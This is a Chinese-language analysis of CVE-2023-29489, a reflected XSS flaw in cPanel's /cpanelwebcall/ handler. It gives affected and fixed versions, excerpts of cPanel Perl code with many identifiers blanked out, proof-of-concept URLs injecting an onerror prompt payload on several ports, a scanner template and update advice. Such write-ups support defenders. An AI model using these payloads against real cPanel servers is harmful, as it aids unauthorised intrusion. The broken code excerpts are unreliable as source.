cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。
该漏洞可以无身份验证情况下利用,无论cPanel管理端口2080, 2082, 2083, 2086是否对外开放
供应商:cPanel
产品:cPanel
确认受影响版本:< 11.109.9999.116
修复版本:11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31
本漏洞的漏洞点来自系统中涉及交互的关键变量未进行转义或过滤处理,导致攻击者可以构造恶意代码作为输入进行利用。
Httpd.pm:
elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
# First 15 chars are “/cpanelwebcall/”
(
$self-> (),
substr( $doc_path, 15 ),
);
}
上述代码说明任何路径均会被路由到,包括目录后的字符部分。
其中涉及函数_serve_cpanelwebcall:
sub ( $server_obj, $webcall_uri_piece ) {
require :::: ;
my $out = :::::: ($webcall_uri_piece);
$server_obj-> ($out);
return;
}
其中局部变量out为handle函数的返回值,是参数webcall_uri_piece的处理结果。
sub ($request) {
my $id = ($request);
substr( $request, 0, length $id ) = q<>;
:::::: ($id) or do {
die ("Invalid webcall ID: $id");
};
handle函数主要先从request提取id,之后根据id情况进行处理
sub ($why) {
return :::: ( 'cpsrvd::BadRequest', $why );
}
_http_invalid_params_err函数主要是返回错误信息
进一步分析发现Httpd::ErrorPage下的 message_html变量未做任何处理,可被该漏洞利用
在最新版本cPanel可以看到针对该漏洞进行修复
Cpanel/Server/Handlers/Httpd/ErrorPage.pm:
++ use :::: ();
... for ...
++ $var{message_html} = :::::: ( $var{message_html} );
首先以某个cPanel target为例
之后根据POC进行复现
POC:
http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
注:其他端口也有可能存在该漏洞
requests
method GET
path
'{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
matchers
type word
words
'<img src=x onerror="prompt(1)">'
执行POC
建议更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31
启用cPanel 自动更新功能
本文主要介绍了CVE-2023-29489 cPanel XSS漏洞的原理分析及复现过程,漏洞主要由于涉及交互的关键变量未进行转义或过滤处理,从而造成攻击者可以在无身份验证情况下进行利用。